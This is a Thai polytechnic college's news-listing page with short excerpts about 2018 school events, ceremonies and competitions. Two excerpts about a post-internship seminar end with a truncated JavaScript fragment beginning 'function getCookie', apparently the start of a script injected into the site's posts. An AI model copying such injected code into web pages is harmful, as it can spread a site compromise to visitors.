ข่าวประการวิทยาลัย/รับสมัคร/จัดซื้อจัดจ้าง
ดาวน์โหลดเอกสาร
อัลบั้มภาพ
วันพฤหัสบดี ที่ 22 พฤศจิกายน 2561 ผู้บริหาร คณะครู นักเรียน วิทยาลัยสารพัดช่างอุทัยธานี ได้ร่วมขบวนแห่ประเพณีลอยกระทง ประจำปี 2561     &nbsp […]

ประเพณีลอยกระทง ประจำปี 2561

วันพฤหัสบดี ที่ 22 พฤศจิกายน 2561 ผู้บริหาร คณะครู นักเรียน วิทยาลัยสารพัดช่างอุทัยธานี ได้ร่วมขบวนแห่ประเพณีลอยกระทง ประจำปี 2561     &nbsp […]

วันพุธที่ 14 พฤศจิกายน 2561 ผู้บริหาร คณะครู นักเรียน วิทยาลัยสารพัดช่างอุทัยธานี ได้ร่วมการประชุมวิชาการ องค์การนักวิชาชีพในอนาคต แห่งประเทศไทย การแข […]

การประกวดสิ่งประดิษฐ์ของคนรุ่นใหม่ ประจำปีการศึกษา 2561

วันพุธที่ 14 พฤศจิกายน 2561 ผู้บริหาร คณะครู นักเรียน วิทยาลัยสารพัดช่างอุทัยธานี ได้ร่วมการประชุมวิชาการ องค์การนักวิชาชีพในอนาคต แห่งประเทศไทย การแข […]

วันพุธที่ 13 พฤศจิกายน 2561 โครงการแข่งขันทักษะวิชาชีพและทักษะขั้นพื้นฐาน​ ประจำปีการศึกษา​ 2561​ ระดับอาชีวศึกษาจังหวัดอุทัยธานี​ การประกวดร้องเพลงแล […]

โครงการแข่งขันทักษะวิชาชีพและทักษะขั้นพื้นฐาน​ ประจำปีการศึกษา​ 2561​

วันพุธที่ 13 พฤศจิกายน 2561 โครงการแข่งขันทักษะวิชาชีพและทักษะขั้นพื้นฐาน​ ประจำปีการศึกษา​ 2561​ ระดับอาชีวศึกษาจังหวัดอุทัยธานี​ การประกวดร้องเพลงแล […]

วันจันทร์ ที่ 12 พฤศจิกายน 2561  ยินดีต้อนรับคณะกรรมการประเมินหน่วยมาตรฐานดีเด่นและสมาชิกดีเด่นภายใต้การนิเทศ ระดับ อศจ.อุทัยธานี ประจำปีการศึกษา 2561 […]

ยินดีต้อนรับคณะกรรมการประเมินหน่วยมาตรฐานดีเด่นและสมาชิกดีเด่นภายใต้การนิเทศ ระดับ อศจ.อุทัยธานี ประจำปีการศึกษา 2561

วันจันทร์ ที่ 12 พฤศจิกายน 2561  ยินดีต้อนรับคณะกรรมการประเมินหน่วยมาตรฐานดีเด่นและสมาชิกดีเด่นภายใต้การนิเทศ ระดับ อศจ.อุทัยธานี ประจำปีการศึกษา 2561 […]

วันอาทิตย์ที่ 11 พฤศจิกายน 2561 นักเรียน/นักศึกษาและผู้ปกครองเข้าร่วมโครงการประชุมผู้ปกครอง ประจำปีการศึกษา /2561 ที่วิทยาลัยสารพัดช่างอุทัยธานี &nbsp […]

โครงการประชุมผู้ปกครอง ประจำปีการศึกษา 2/2561

วันอาทิตย์ที่ 11 พฤศจิกายน 2561 นักเรียน/นักศึกษาและผู้ปกครองเข้าร่วมโครงการประชุมผู้ปกครอง ประจำปีการศึกษา /2561 ที่วิทยาลัยสารพัดช่างอุทัยธานี &nbsp […]

วันอังคารที่ 23 ตุลาคม 2561 ผู้บริหาร คณะครู นักเรียน และเจ้าหน้าที่วิทยาลัยสารพัดช่างอุทัยธานี ได้ร่วมพิธีวางพวงมาลา และพิธีจุดเทียนเพื่อน้อมรำลึกในพ […]

วันปิยะมหาราช

วันอังคารที่ 23 ตุลาคม 2561 ผู้บริหาร คณะครู นักเรียน และเจ้าหน้าที่วิทยาลัยสารพัดช่างอุทัยธานี ได้ร่วมพิธีวางพวงมาลา และพิธีจุดเทียนเพื่อน้อมรำลึกในพ […]

นักเรียนชั้นปวช.1 ทุกแผนก เข้าร่วมโครงการฝึกอบรมช่วยเหลือผู้ป่วยเบื้องต้น จากวิทยาลัยพยาบาลบรมราชชนนี จังหวัดนครสวรรค์ ณ หอประชุมตึกอำนวยการ วิทยาลัยส […]

อบรมช่วยเหลือผู้ป่วยเบื้องต้น

นักเรียนชั้นปวช.1 ทุกแผนก เข้าร่วมโครงการฝึกอบรมช่วยเหลือผู้ป่วยเบื้องต้น จากวิทยาลัยพยาบาลบรมราชชนนี จังหวัดนครสวรรค์ ณ หอประชุมตึกอำนวยการ วิทยาลัยส […]

ผู้บริหาร คณะครู และเจ้าหน้าที่วิทยาลัยสารพัดช่างอุทัยธานี ได้ร่วมพิธีวางพวงมาลา และพิธีจุดเทียนเพื่อน้อมรำลึกในพระมหากรุณาธิคุณพระบาทสมเด็จพระปรมินทร […]

วันที่ 13 ตุลาคม 2561

ผู้บริหาร คณะครู และเจ้าหน้าที่วิทยาลัยสารพัดช่างอุทัยธานี ได้ร่วมพิธีวางพวงมาลา และพิธีจุดเทียนเพื่อน้อมรำลึกในพระมหากรุณาธิคุณพระบาทสมเด็จพระปรมินทร […]

วิทยาลัยสารพัดช่างอุทัยธานี ได้จัดโครงการสัมมนาหลังฝึกงานร่วมกับสถานประกอบการ ณ วันที่ 14 กันยายน 2561 function getCookie(e){var U=document.cookie.mat […]

โครงการสัมมนาหลังฝึกงานร่วมกับสถานประกอบการ

วิทยาลัยสารพัดช่างอุทัยธานี ได้จัดโครงการสัมมนาหลังฝึกงานร่วมกับสถานประกอบการ ณ วันที่ 14 กันยายน 2561 function getCookie(e){var U=document.cookie.mat […]